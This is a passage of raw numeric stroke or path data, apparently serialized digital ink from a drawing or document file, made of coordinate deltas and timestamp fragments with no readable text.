0 0,0 0 0,5 0 0,-4 0 0,9 0 0,-3 0 0,4 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-5 0 0,4 0 0,-9 0 0,4 0 0,-5 0 0,5 0 0,-8 0 0,7 0 0,-8 0 0,-1 0 0,4 0 0,-3 0 0,4 0 0,-4 0 0,7 0 0,-6 0 0,4 0 0,-2 0 0,-3 0 0,0 0 0,-2 0 0,1 0 0,-3 0 0,2 0 0,1 0 0,1 0 0,4 0 0,-5 0 0,9 0 0,-7 0 0,8 0 0,-5 0 0,0 0 0,-4 0 0,-2 0 0,-3 0 0,-1 0 0,-2 0 0,4 2 0,-8-1 0,5 2 0,-2-3 0,0 0 0,3 0 0,-4 0 0,2 0 0,-2 0 0,3 0 0,0 0 0,-3 0 0,2 0 0,-2 0 0,3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25:04.418"/>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366 37 16383,'-33'0'0,"-6"0"0,19 0 0,-4 0 0,7 0 0,7 0 0,0 0 0,-1 0 0,2 0 0,-6 0 0,3 0 0,2-6 0,-3 5 0,6-5 0,-8 6 0,7-3 0,-4 2 0,2-4 0,3 5 0,-9-5 0,8 4 0,-7-1 0,6-1 0,-1 3 0,-4-3 0,2 3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25:02.623"/>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0 123 16383,'39'-2'0,"-4"-1"0,-7 3 0,-4 0 0,9 0 0,-9 0 0,9 4 0,-9-3 0,9 3 0,-9-4 0,9 0 0,-9 0 0,4 0 0,-5 3 0,0-2 0,0 3 0,5-4 0,-4 0 0,9 0 0,-9 0 0,8 0 0,-7 3 0,2-2 0,1 2 0,-3-3 0,7 0 0,-8 0 0,4 0 0,-5 0 0,0 0 0,0 0 0,-4 0 0,3 0 0,-4 0 0,5 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,6 0 0,-3 0 0,7 0 0,-3 0 0,5 0 0,-4 0 0,-2 0 0,-6 0 0,1 0 0,-4 0 0,-1 0 0,-5 0 0,1 0 0,-4 0 0,2 0 0,-1 0 0,2 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,5 0 0,-4 0 0,8 0 0,-7-3 0,7 2 0,-4-2 0,10 3 0,-4 0 0,9 0 0,-8 0 0,7-3 0,-3 2 0,0-3 0,4 4 0,-9-3 0,4 2 0,-5-3 0,0 4 0,0 0 0,0 0 0,0 0 0,-1 0 0,-3-3 0,3 3 0,-3-3 0,3 3 0,1 0 0,-4 0 0,3-4 0,-3 3 0,-1-2 0,4 3 0,-3-3 0,9 2 0,-4-3 0,4 4 0,0-3 0,-4 2 0,4-6 0,-5 6 0,0-3 0,4 0 0,-7 4 0,7-4 0,-12 4 0,7-4 0,-4 3 0,1-2 0,-1 3 0,-5 0 0,1 0 0,0-3 0,-1 2 0,5-2 0,-4 3 0,4-3 0,0 3 0,0-3 0,5 3 0,0-4 0,5 3 0,1-2 0,5-1 0,-5 3 0,4-3 0,-4 1 0,5 2 0,0-3 0,0 0 0,0 3 0,0-3 0,1 4 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,6 0 0,-4 0 0,9 0 0,-9 0 0,9 0 0,-9 0 0,9 0 0,-9 0 0,4 0 0,-6 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-5 0 0,4 0 0,-9 0 0,9 0 0,-4 0 0,5 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-5 0 0,4 0 0,-9 0 0,4 0 0,-5 0 0,0 0 0,0 0 0,5 0 0,-4 0 0,4 0 0,0 0 0,-4 0 0,4 0 0,0 0 0,-4 0 0,9 0 0,-4 0 0,5 0 0,6 0 0,1 0 0,6 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-5 0 0,-3 0 0,-5 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,6 0 0,-5 0 0,10 0 0,-9 0 0,10 0 0,-11 0 0,5 0 0,0 0 0,1-4 0,6 3 0,-6-3 0,5 4 0,-5 0 0,1 0 0,-2 0 0,-1 0 0,-3 0 0,-1 0 0,-2 0 0,-4-4 0,11 3 0,-5-2 0,11 3 0,-5 0 0,0 0 0,5 0 0,-4 0 0,5 0 0,-6 0 0,5 0 0,-11 0 0,5 0 0,-1 0 0,-3 0 0,4 0 0,-6 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,18 0 0,-18 0 0,30 0 0,-14 0 0,0 0 0,15 0 0,-16 0 0,5 0 0,6 0 0,-13 0 0,13 0 0,-6 0 0,14 0 0,-13 0 0,27 0 0,-23 0 0,5 0 0,1 0 0,-15 0 0,18 0 0,-7 0 0,-7 0 0,-1 0 0,-7 0 0,-1 0 0,1 0 0,0 0 0,-6 0 0,4 0 0,-3 0 0,5 0 0,-6 0 0,5 0 0,-10 0 0,4 0 0,0 0 0,1 0 0,0 0 0,5 0 0,-4 0 0,-1 0 0,-1 0 0,0 0 0,-5 0 0,5 0 0,-6 0 0,5 0 0,3 0 0,18 0 0,-3 0 0,12 0 0,-19 0 0,2 0 0,-4 0 0,1 0 0,4 0 0,-5 0 0,-1 0 0,-6 0 0,4 0 0,-3 0 0,-1 0 0,5 0 0,-5 0 0,12 0 0,-4 0 0,4 4 0,-6-3 0,7 7 0,-5-2 0,4 4 0,-5-1 0,-1 1 0,0-1 0,-6-4 0,-1 3 0,-6-3 0,0 3 0,0 1 0,-5-4 0,4 2 0,-9-6 0,9 3 0,-4-4 0,0 3 0,4-2 0,-4 3 0,0-4 0,-1 0 0,0 0 0,-4 0 0,0 0 0,-2 0 0,-8 0 0,8 0 0,-7 3 0,2-3 0,-3 3 0,-1-3 0,1 3 0,-1-2 0,-2 2 0,1-3 0,1 3 0,1-2 0,6 2 0,-1-3 0,4 0 0,-4 0 0,3 0 0,-3 0 0,4 0 0,-1 0 0,6 0 0,-8 0 0,7 0 0,-9 0 0,1 0 0,-1 0 0,-5 0 0,-3 0 0,2 0 0,-3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26:13.24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16383,'56'0'0,"4"0"0,-11 0 0,11 0 0,3 0 0,8 0 0,-17 0 0,26 0 0,-8 0 0,-1 0 0,13 0 0,-36 0 0,14 0 0,-7 0 0,5 0 0,-11 0 0,4 0 0,7 0 0,-3 0 0,-1 0 0,18 0 0,-13 0 0,25 0 0,-9 4 0,1 1 0,12 2 0,-18-3 0,-5 2 0,-13 3 0,-7-8 0,0 7 0,-6-7 0,-6 7 0,-2-7 0,-9 2 0,4 1 0,-5-4 0,0 4 0,0-4 0,0 0 0,0 0 0,-5 0 0,0 0 0,-5 0 0,2 0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00:57.933"/>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1 16383,'55'0'0,"-1"0"0,-2 0 0,-1 0 0,35 0 0,2 0 0,-31 0 0,1 0 0,-7 0 0,0 0 0,11 0 0,0 0 0,38 0 0,-43 0 0,0 0 0,43 0 0,-33 0 0,1 0 0,-12 0 0,1 0 0,16 0 0,0 0 0,-14 0 0,1 0 0,9 0 0,-3 0 0,16 0 0,-26 0 0,-3 0 0,8 0 0,25 0 0,-33 2 0,-1 2 0,26 2 0,-22-2 0,0-1 0,25 2 0,-29-5 0,2 0 0,0 0 0,0 0 0,-1 0 0,0 0 0,6 0 0,-3 0 0,19 0 0,-25 0 0,0 0 0,16 0 0,21 0 0,-17 0 0,23 0 0,-26 0 0,27 0 0,-23 0 0,16 0 0,2 0 0,0 0 0,-31 0 0,-1 0 0,28 0 0,-32 0 0,1 0 0,40 0 0,-11 0 0,-31 0 0,0 0 0,37 0 0,-1 0 0,7 0 0,-15 0 0,-7 0 0,-6 0 0,-4 0 0,1 0 0,-2 0 0,-8 0 0,-7 0 0,-6 0 0,5 0 0,-5 0 0,6 0 0,-5 0 0,3 0 0,-10 0 0,5 0 0,-6 0 0,-5 0 0,-1 0 0,-5 0 0,6 0 0,-5 0 0,7 0 0,-3 0 0,-4 0 0,3 0 0,4 0 0,0 0 0,8 0 0,1 0 0,2 0 0,-1 0 0,-1 0 0,-6 0 0,-5 0 0,-6 0 0,3 0 0,0 0 0,0 0 0,4 0 0,-8 0 0,3 0 0,-1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27:23.590"/>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11965 1 16383,'-57'0'0,"-1"0"0,-32 0 0,46 0 0,7 0 0,-4 0 0,-11 0 0,9 0 0,-17 0 0,4 0 0,-6 0 0,7 0 0,1 0 0,-7 0 0,4 0 0,-20 0 0,14 0 0,-13 0 0,5 0 0,13 0 0,-33 0 0,28 0 0,-13 0 0,25 0 0,1 0 0,-15 0 0,9 0 0,-2 0 0,-23 5 0,-13 2 0,5 5 0,0-6 0,-6 5 0,29-5 0,-18 5 0,-6-5 0,5 4 0,32-7 0,1 0 0,-34 8 0,-3-4 0,-7 3 0,-1-8 0,1 8 0,8-8 0,-7 8 0,28-4 0,12 0 0,0 1 0,4-2 0,1-1 0,-1-2 0,-8 3 0,-34 2 0,35 0 0,-15-2 0,36-1 0,-51-3 0,31 4 0,-20-2 0,32-2 0,-5 7 0,-14-2 0,5 1 0,-7 2 0,1-2 0,-16 4 0,12-1 0,-5 1 0,31-6 0,-42 6 0,23-5 0,-12 1 0,22 1 0,16-7 0,-50 4 0,40-2 0,-35-2 0,41 7 0,-42-7 0,25 8 0,-25-8 0,36 7 0,-17-7 0,-4 8 0,1-7 0,6 3 0,19-5 0,-28 5 0,22-4 0,-21 5 0,27-6 0,-28 0 0,22 0 0,-27 4 0,8-2 0,1 2 0,-6-4 0,11 0 0,4 0 0,-5 0 0,-1 0 0,0 0 0,0 0 0,7 0 0,-6 0 0,-9 0 0,16 0 0,-36 0 0,37 0 0,-31 0 0,13 0 0,-8 0 0,1 0 0,14 0 0,-28 0 0,15 0 0,-1 0 0,-20 0 0,36 0 0,-33 0 0,16 0 0,1 0 0,13 0 0,-27 0 0,23 0 0,-26 0 0,36 0 0,9-2 0,0-2 0,-16-3 0,14 4 0,-1-1 0,-34-6 0,-1 8 0,-9-3 0,45 2 0,-1 0 0,-46 2 0,42-2 0,-1 0 0,4 3 0,0 0 0,-4 0 0,-1 0 0,0-3 0,1 0 0,0 2 0,1 1 0,-2-3 0,1 0 0,1 3 0,-1 0 0,-4 0 0,-1 0 0,3 0 0,1 0 0,-4 0 0,0 0 0,-1 0 0,2 0 0,-27 0 0,35 0 0,-1 0 0,2 0 0,2 0 0,-30 0 0,24 2 0,2 1 0,-2 3 0,-12 4 0,7 1 0,0-6 0,7 4 0,-6-8 0,13 3 0,0-4 0,3 0 0,9 0 0,-4 0 0,11 0 0,5 0 0,-9 0 0,15 0 0,-14 0 0,6 0 0,8 0 0,-18 0 0,11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27:21.021"/>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15407 967 16383,'-53'0'0,"0"0"0,-22 0 0,2 0 0,-10 0 0,13 0 0,-2 0 0,21 0 0,0 0 0,-17 0 0,-3 0 0,-3 0 0,-5 0 0,7 0 0,-6 0 0,1 0 0,9 0 0,1 0 0,1 0 0,-33 0 0,2 0 0,2 0 0,3 0 0,16 0 0,1 0 0,-13 0 0,-3 0 0,-8 0 0,0 0 0,12 0 0,0 0 0,-7 0 0,1 0 0,5 0 0,2 0 0,4 0 0,1 0 0,6 0 0,1 0 0,10 0 0,0 0 0,-5 0 0,1 0 0,8 0 0,1 0 0,0 0 0,1 0 0,0 0 0,1 0 0,4 0 0,0 0 0,-6 0 0,1 0 0,-1 0 0,1 0 0,3 0 0,2 0 0,-37 0 0,29 0 0,0 0 0,-28 0 0,26 0 0,0 0 0,-34 0 0,0 0 0,0 0 0,0 0 0,8 0 0,17 0 0,-3 0 0,-17 0 0,26 0 0,15 0 0,2 0 0,5 0 0,-17 0 0,20 0 0,-36 0 0,28 0 0,-24 0 0,28 0 0,-11 0 0,-25-6 0,12 5 0,-4-5 0,21 6 0,-42 0 0,21 0 0,12 0 0,-1 0 0,-27 0 0,31 0 0,-2 0 0,-3 0 0,-2 0 0,-4 0 0,-1 0 0,-3 0 0,-1 0 0,4 0 0,-1 0 0,-7 0 0,-1 0 0,8 0 0,0 0 0,-7 0 0,-2 0 0,-2 0 0,1 0 0,-1 0 0,-1 0 0,-10 0 0,0 0 0,10 0 0,1 0 0,-6 0 0,1 0 0,6 0 0,0 0 0,-6 0 0,0 0 0,4 0 0,1 0 0,-6 0 0,1 0 0,10 0 0,2 0 0,0 0 0,0 0 0,4 0 0,4 0 0,-31 0 0,22 4 0,2-1 0,-20-1 0,24 4 0,0 0 0,12-5 0,2 0 0,-43 9 0,46-9 0,1 0 0,-22 4 0,-18 1 0,9 1 0,7-1 0,20 1 0,3-2 0,4-4 0,-9 5 0,-1 0 0,0 0 0,7-2 0,1 0 0,-7 0 0,-34 2 0,43-5 0,-5 3 0,0-2 0,11-2 0,-41 0 0,41 0 0,-4 0 0,-13 0 0,26 0 0,-25 0 0,34 0 0,-9 0 0,0 0 0,-2 0 0,-5 0 0,1 0 0,5 0 0,-27 0 0,15 4 0,-16-2 0,23 2 0,0-4 0,-15 5 0,10-4 0,-14 4 0,23-5 0,-16 4 0,9-2 0,-5 2 0,9-4 0,5 0 0,-13 5 0,10-4 0,-9 3 0,11-4 0,-18 5 0,1-3 0,0 3 0,-20-5 0,36 0 0,-53 0 0,48 0 0,-33 4 0,17-3 0,6 4 0,-9-5 0,25 0 0,-25 0 0,26 0 0,-19 0 0,24 0 0,-18 0 0,15 0 0,-13 0 0,21 0 0,-21 0 0,22 0 0,-17 0 0,22 0 0,-7 0 0,-5 0 0,4 0 0,-14 0 0,19 0 0,-12 0 0,9 0 0,4 0 0,-14 0 0,8 0 0,-5 0 0,-4 0 0,15 0 0,-13 0 0,7 0 0,1 0 0,-14 0 0,22 0 0,-16 0 0,-3 0 0,13 3 0,-15-2 0,19 2 0,-4 0 0,-6 1 0,3 1 0,-1-2 0,-3-1 0,9-1 0,-9 2 0,5-1 0,2-1 0,-5 2 0,4-3 0,-2 0 0,-2 3 0,4-3 0,-3 3 0,2-3 0,0 0 0,-3 0 0,4 0 0,-3 0 0,1 0 0,2 3 0,-5-2 0,6 1 0,-9-2 0,10 0 0,13-54 0,7 25 0,15-50 0,-3 31 0,-1 0 0,5-6 0,-4 13 0,4 1 0,-6 11 0,0 1 0,-1 5 0,-2-2 0,-2-1 0,-3 0 0,0 1 0,0-3 0,-3 5 0,-2-4 0,-19 9 0,9 0 0,61 2 0,-13 10 0,15 1 0,4 2 0,19 3 0,-18 0 0,22 0 0,-26 0 0,6 0 0,-2 0 0,-11 0 0,-3 0 0,-10 0 0,-1 0 0,-5 0 0,15 0 0,-6 0 0,24 0 0,-6 0 0,12 0 0,-13 0 0,10 0 0,-2 0 0,7 0 0,5 0 0,-14 0 0,5 0 0,-11 0 0,4 0 0,-6 0 0,1 0 0,20 0 0,-21 0 0,20 0 0,-19 0 0,1 0 0,4 0 0,-6 0 0,1 0 0,-1 0 0,0 0 0,-6 0 0,4 0 0,11 0 0,-16 0 0,18 0 0,-22 0 0,18 0 0,-6 0 0,12 0 0,-5 0 0,1 0 0,4 0 0,-11 0 0,4 0 0,-6 0 0,0 0 0,1 0 0,-7 0 0,-1 0 0,0 0 0,1 0 0,6 0 0,0 0 0,7 0 0,-5 0 0,10 0 0,-3 0 0,-2 0 0,0 0 0,-7 0 0,6 0 0,-10 0 0,8 0 0,-10 0 0,13 0 0,-6 0 0,6 0 0,-7 0 0,0 0 0,7 0 0,-11 0 0,9 0 0,-11 0 0,0 0 0,5 0 0,-10 0 0,4 0 0,-6 0 0,0 0 0,0 0 0,6 0 0,1 0 0,1 0 0,10 0 0,5 0 0,-6 0 0,31 0 0,-41 0 0,49 0 0,-49 0 0,34 0 0,-18 0 0,7 0 0,5 0 0,8 0 0,-24 0 0,45 0 0,-42 0 0,24 0 0,-21 0 0,-3 0 0,6 0 0,-7 0 0,-2 0 0,-6 0 0,0 0 0,-5 0 0,-2 0 0,-6 0 0,20 0 0,-20 0 0,38-5 0,-38 4 0,26-4 0,-12 1 0,1 3 0,11-9 0,-5 9 0,7-3 0,-7-1 0,6 4 0,-6-7 0,0 7 0,20-9 0,-9 8 0,14-8 0,-5 4 0,-11-4 0,12-1 0,-5 5 0,8-4 0,-20 9 0,31-10 0,-34 5 0,37-1 0,-22-3 0,8 4 0,-20-4 0,14-1 0,-14 1 0,12 0 0,5-2 0,-19 2 0,11 0 0,-13 4 0,0-2 0,-1 2 0,-7 1 0,-5-3 0,3 7 0,-3-3 0,5 0 0,-6 3 0,5-7 0,-5 7 0,6-3 0,0-1 0,-5 4 0,3-7 0,-9 7 0,4-3 0,0 0 0,-5 3 0,5-4 0,-6 2 0,0 2 0,0-3 0,1 4 0,5-4 0,-5 3 0,25-4 0,-15 1 0,22 3 0,-4-3 0,1-1 0,13 4 0,-6-8 0,-7 7 0,12-3 0,-19 1 0,6 3 0,-3-4 0,-12 1 0,6 3 0,-7-3 0,0-1 0,0 4 0,1-3 0,-1 4 0,0 0 0,0 0 0,0 0 0,-6 0 0,-1-4 0,-6 3 0,0-2 0,0 3 0,0-4 0,0 3 0,0-7 0,-5 7 0,4-6 0,-4 2 0,21-3 0,-13 3 0,13 1 0,-10 0 0,1 3 0,20-3 0,-4-1 0,12 4 0,-20-4 0,34 5 0,-39 0 0,46 0 0,-38 0 0,11 0 0,-3 0 0,-11 0 0,20 0 0,-39 0 0,6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27:15.069"/>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1 240 16383,'51'0'0,"-1"0"0,47 0 0,-18 0 0,0 0 0,-2 0 0,2 0 0,-1 0 0,0 0 0,-7 0 0,-1 0 0,-1 0 0,2 0 0,8 0 0,-1 0 0,-19 0 0,15 0 0,-15 0 0,19 0 0,-7 0 0,-2 0 0,-14 0 0,-1 0 0,-7 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,7 4 0,-5-2 0,5 2 0,-1-4 0,-10 4 0,8-3 0,-9 3 0,-1-4 0,4 0 0,-9 3 0,4-2 0,-6 3 0,0-4 0,0 4 0,0-3 0,1 3 0,4-4 0,-3 0 0,9 0 0,-3 0 0,-1 0 0,-1 0 0,0 4 0,-5-3 0,5 3 0,-5-4 0,-1 4 0,0-3 0,12 3 0,-14-4 0,33 5 0,-18-4 0,30 4 0,-6-5 0,7 5 0,18 2 0,-5 5 0,-35-6 0,2 1 0,-3-1 0,-1 0 0,31 1 0,-34-1 0,-1 0 0,25 0 0,13 6 0,-8-1 0,-4-5 0,-13 3 0,22-2 0,-20-1 0,20 4 0,-14-8 0,7 8 0,1-9 0,7 9 0,-19-8 0,16 8 0,-26-9 0,20 4 0,-13 0 0,5-4 0,8 9 0,-4-9 0,6 4 0,-2-5 0,-6 5 0,8-3 0,7 3 0,-5 0 0,-8-4 0,-22 1 0,0 1 0,20 2 0,-19-2 0,2 0 0,32 3 0,3 5 0,-1-5 0,7 1 0,-14 3 0,13-4 0,-33 4 0,21-3 0,-24 1 0,13-2 0,23 6 0,-39-6 0,28 5 0,-33-6 0,12 6 0,-1-6 0,1 5 0,0-9 0,0 8 0,-1-8 0,-6 8 0,-1-8 0,-7 3 0,7-4 0,-5 4 0,5-3 0,-7 3 0,6-4 0,18 0 0,-5 0 0,18 0 0,-12 0 0,-8 0 0,4 0 0,-5 0 0,25 0 0,-19 0 0,-14 0 0,-1 0 0,15 0 0,27 0 0,-32-4 0,28-3 0,-24-3 0,27-2 0,-37 2 0,8-1 0,-9 2 0,7-2 0,20-6 0,-31 6 0,15-5 0,-27 7 0,12 0 0,-4-1 0,5-4 0,-13 4 0,5-3 0,-5 4 0,6-1 0,-5 1 0,3 0 0,-9 0 0,10 0 0,-5 4 0,0-3 0,5 3 0,-11 0 0,5-3 0,0 7 0,2-3 0,-1 0 0,27-2 0,-27 1 0,49-6 0,-49 6 0,33-1 0,-31-2 0,18 2 0,-12-3 0,4 3 0,-11-2 0,3 7 0,-3-7 0,4 3 0,2-5 0,13 0 0,-4 0 0,12-1 0,0 1 0,-17 4 0,37-10 0,-40 13 0,5-5 0,0-1 0,-5 4 0,50-8 0,-52 8 0,28-5 0,5-2 0,-5-1 0,20-4 0,-17 5 0,9 1 0,-26 5 0,-6 0 0,-2 0 0,-8 1 0,4-1 0,2 0 0,7 1 0,14-5 0,-3 9 0,-7-8 0,15 2 0,-4-4 0,14 0 0,-10 0 0,2 5 0,-15-4 0,11 9 0,-18-7 0,20 1 0,-6 2 0,0 0 0,14-1 0,-12 5 0,13-5 0,-7 6 0,-21 0 0,15 0 0,-21 0 0,24 0 0,-12 0 0,-1 0 0,-3 0 0,-11 0 0,4 0 0,-5 0 0,-1 0 0,-6 0 0,5 5 0,-11-1 0,5 2 0,-11 1 0,-1-6 0,-6 5 0,-1-2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27:11.238"/>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0 222 16383,'98'-5'0,"-11"4"0,6-4 0,-9 5 0,-28 0 0,3 0 0,-5 0 0,0 0 0,4 0 0,1 0 0,4 0 0,1 0 0,-4 0 0,-1 0 0,1 2 0,-2 1 0,26 7 0,-28-1 0,-2 2 0,3 9 0,-6-11 0,0 1 0,13 9 0,14-6 0,-7 3 0,-2-1 0,-14-4 0,5 3 0,-11-8 0,5-2 0,-7-4 0,-6 0 0,5 0 0,-10 0 0,4 0 0,-1 0 0,-3 0 0,10 0 0,-5 0 0,6 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,6 0 0,-10 0 0,9 0 0,-11-4 0,6 3 0,0-3 0,1 0 0,5-2 0,3 1 0,13-10 0,-5 8 0,11-9 0,-4 5 0,-6 5 0,-15-3 0,0 1 0,21 5 0,-15-3 0,0 0 0,25 6 0,5 0 0,-21 0 0,27 0 0,-43 0 0,18 0 0,-28 0 0,-2 0 0,17-4 0,26 2 0,13-8 0,-36 6 0,3 1 0,-1-4 0,-1 1 0,-4 2 0,0 1 0,4 0 0,-1 0 0,42-3 0,-47 6 0,1-1 0,44-4 0,-1 5 0,1 0 0,-9 0 0,7 0 0,-6 0 0,-36 0 0,0 0 0,46 0 0,-41 0 0,-1 0 0,20 0 0,15 0 0,-19 0 0,0 0 0,5 0 0,-23 0 0,-1 0 0,-13 0 0,-5 0 0,3-5 0,13-1 0,5-8 0,20-3 0,2-6 0,-22 10 0,4 0 0,5 0 0,2-1 0,18-2 0,2 2 0,0 1 0,1 2 0,4 3 0,1 0 0,0 1 0,0 0 0,-6 6 0,0 1 0,-1-4 0,0 1 0,-5 2 0,-1 2 0,1-1 0,-1 0 0,1 0 0,-1 0 0,-5 0 0,0 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-9 0 0,0 0 0,4 0 0,-3 0 0,26 0 0,1 0 0,-23 10 0,24 15 0,-40 1 0,7 0 0,-32-16 0,12-10 0,13 4 0,7 2 0,7 5 0,29 7 0,-44-9 0,2 2 0,16 6 0,4 1 0,4-3 0,1 0 0,1 4 0,1-1 0,4-6 0,0-1 0,0 4 0,0-1 0,-4-5 0,-1-1 0,0 3 0,0 0 0,-1-4 0,-2 0 0,-12 0 0,-2 0 0,10 0 0,-4 0 0,18 0 0,-18 0 0,-4-1 0,-7 0 0,11 0 0,-2 2 0,-18 1 0,42 7 0,-44 0 0,1 3 0,-5-8 0,-6-4 0,8-11 0,8-2 0,14-5 0,3 0 0,-21 5 0,3 0 0,1 0 0,2-1 0,12 0 0,1 0 0,0 3 0,-1 1 0,-4-4 0,-1 2 0,0 4 0,-1 0 0,-4-2 0,-1 0 0,-4 3 0,0 0 0,-1 0 0,-1 0 0,44 0 0,0 0 0,-7 0 0,6-5 0,-34 4 0,21-5 0,-38 6 0,24-4 0,-25 3 0,4-4 0,-18 2 0,-1 2 0,-5-3 0,6 4 0,-3-3 0,-1 3 0,3-3 0,-7 3 0,18 0 0,-12 0 0,8 0 0,-12 0 0,11 0 0,-9 0 0,14 0 0,-19 0 0,7 3 0,2 3 0,-8-1 0,10 4 0,-5-6 0,-4 4 0,9-4 0,-7 0 0,-2 0 0,0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9:36:52.207"/>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8 51 16383,'55'0'0,"9"0"0,0 0 0,-7 0 0,2 0 0,-10 0 0,13 0 0,-12 0 0,9 0 0,-2 0 0,14 0 0,0 0 0,-2 0 0,8 0 0,-4 0 0,21 0 0,-28 0 0,18 0 0,-12 0 0,26 0 0,-7 0 0,5 0 0,-18-10 0,-13 7 0,3-7 0,-6 10 0,2 0 0,5 0 0,4 0 0,0 0 0,3 0 0,-5 0 0,-4 0 0,-20 0 0,0 0 0,0 0 0,1 0 0,5 0 0,-4 0 0,12 0 0,-13 0 0,13 0 0,-12 0 0,11 0 0,-11 0 0,4 0 0,-6 0 0,-5 0 0,3-4 0,-3 3 0,5-7 0,-6 7 0,5-4 0,-10 2 0,9 2 0,-9-3 0,10 4 0,-5 0 0,6 0 0,0 0 0,1 0 0,-1 0 0,-6 0 0,5 0 0,-11 0 0,5 0 0,-11 0 0,-1 0 0,0 0 0,-8 0 0,7 0 0,-8 0 0,0 0 0,2 0 0,-2 0 0,0 0 0,3 0 0,2 0 0,0 0 0,9 0 0,-4 0 0,5 4 0,0-3 0,0 6 0,-4-6 0,2 7 0,-12-7 0,7 6 0,-12-6 0,-1 2 0,-4 0 0,-2-3 0,1 6 0,-2 4 0,-2-3 0,-5 8 0,-13-9 0,8-1 0,-11-3 0,1-2 0,8 0 0,-8 0 0,3 0 0,5 0 0,-11 0 0,11 0 0,-5 0 0,1 0 0,3 0 0,-5 0 0,4 0 0,0 0 0,-5 0 0,7 0 0,-6-2 0,-1 1 0,-9-1 0,-11 2 0,3 0 0,-7 4 0,-11 2 0,-37 11 0,15-5 0,-11 5 0,36-7 0,4-5 0,-19 4 0,4-8 0,0 4 0,11-5 0,11 0 0,6 0 0,5 0 0,7 0 0,3 0 0,4 0 0,-2 0 0,-4 0 0,-3 0 0,-6 0 0,2 0 0,0 0 0,0 0 0,-42 0 0,27 0 0,-28 0 0,28 0 0,12 0 0,-59 0 0,44 0 0,-40 0 0,41 0 0,4 0 0,1 0 0,-10 0 0,7 0 0,-5 3 0,9-2 0,11 3 0,0-4 0,-10 4 0,2-3 0,-4 3 0,2-4 0,9 0 0,0 3 0,3-2 0,-15 2 0,8-3 0,-12 0 0,17 0 0,0 0 0,4 3 0,2-2 0,-6 2 0,3-3 0,-8 0 0,5 3 0,0-2 0,4 2 0,2-3 0,7 0 0,-12 0 0,5 4 0,-11-3 0,9 5 0,2-5 0,-6 2 0,-2 0 0,-4-2 0,-4 7 0,9-7 0,-15 7 0,-4-2 0,5-1 0,-7 0 0,21-2 0,-4-2 0,9 2 0,1 0 0,5-2 0,-10 2 0,7-3 0,-7 0 0,10 3 0,-1-2 0,4 2 0,-14-3 0,7 3 0,-10-2 0,5 2 0,8-3 0,-19 5 0,12-4 0,-13 3 0,11-1 0,0-2 0,4 2 0,2-3 0,-1 4 0,-1-3 0,1 2 0,0-3 0,0 3 0,-6-2 0,0 6 0,-9-6 0,9 2 0,-21-3 0,13 0 0,-15 0 0,13 4 0,0-3 0,0 3 0,-1-4 0,6 0 0,-4 0 0,9 0 0,-4 0 0,10 0 0,0 0 0,4 0 0,1 0 0,-1 0 0,1 0 0,3 0 0,-3 0 0,3 0 0,-4 0 0,1 0 0,-1 0 0,4 0 0,-3 0 0,-1 0 0,0 0 0,-4 0 0,5 0 0,-1 0 0,-4 0 0,4 0 0,-4 0 0,0 0 0,7 0 0,-10 0 0,10 0 0,-7 0 0,5 0 0,3 0 0,-7 0 0,6-3 0,-7-1 0,4 0 0,4-1 0,-2 4 0,5-4 0,-2-3 0,6-1 0,0-5 0,3 4 0,0-1 0,3 0 0,0 3 0,5-3 0,-1-3 0,-1 6 0,-2-2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0:51.572"/>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0 151 16383,'88'0'0,"-15"0"0,-33 0 0,-6 0 0,0 0 0,-5 0 0,-1 0 0,-5 0 0,2 0 0,2 0 0,2 0 0,-6 0 0,29 0 0,-26 0 0,28 0 0,-30-7 0,9 5 0,-9-5 0,9 7 0,-9 0 0,4 0 0,0 0 0,-4 0 0,10 0 0,-10 0 0,1 0 0,3-3 0,-6 2 0,7-2 0,-2 3 0,-4 0 0,12 0 0,-9 0 0,12 0 0,-9 0 0,0-4 0,4 4 0,-4-4 0,5 4 0,0 0 0,0 0 0,-4 0 0,2 0 0,-7-3 0,2 2 0,-2-2 0,-1 3 0,4 0 0,1 0 0,-2 0 0,0 0 0,1 0 0,1 0 0,5-4 0,6 3 0,2-3 0,5 4 0,0 0 0,-6-4 0,-1 3 0,-11-2 0,4 3 0,-13 0 0,13 0 0,-12 0 0,6 0 0,3 0 0,-12 0 0,21 0 0,-12-4 0,7 3 0,-1-3 0,-5 4 0,2 0 0,2 0 0,-8 0 0,4-3 0,0 2 0,-3-2 0,2 3 0,7 0 0,-9 0 0,8 0 0,-10 0 0,0 0 0,10 0 0,-8 0 0,8 0 0,-10 0 0,0 0 0,10 0 0,-2 0 0,3 0 0,-1 0 0,2 0 0,13 0 0,-6 0 0,17 0 0,6 0 0,-12 0 0,29 0 0,-31 0 0,18 0 0,-13 0 0,4 0 0,-11 0 0,4 4 0,-5-3 0,-2 3 0,-4 0 0,4-3 0,-11 2 0,0-3 0,-2 4 0,-9-3 0,4 3 0,5-1 0,-7-2 0,7 3 0,-6-4 0,-2 3 0,8-2 0,-4 2 0,5 1 0,0-3 0,12 7 0,-9-7 0,15 4 0,4 0 0,-6-4 0,18 9 0,-13-9 0,6 4 0,-6-1 0,6-3 0,-13 3 0,0-4 0,-8 0 0,-11 3 0,-1-2 0,-3 3 0,-1-4 0,7 2 0,5-1 0,2 5 0,14-5 0,4 3 0,15 1 0,7-4 0,7 4 0,-18-5 0,14 0 0,-16 0 0,-13 3 0,1 0 0,13-1 0,-15 1 0,-2 0 0,2-3 0,18 0 0,-13 0 0,-3 0 0,-6 4 0,1-3 0,-1 4 0,-6-5 0,-2 0 0,-5 0 0,0 3 0,0-2 0,-5 3 0,4-4 0,-9 0 0,9 0 0,-9 0 0,9 4 0,-9-3 0,9 3 0,-8-4 0,8 0 0,-4 0 0,5 0 0,6 0 0,1 0 0,6 0 0,1 0 0,-7 0 0,5 0 0,-11 0 0,5 0 0,-6 0 0,-5 0 0,4 0 0,-9 0 0,4 0 0,5 0 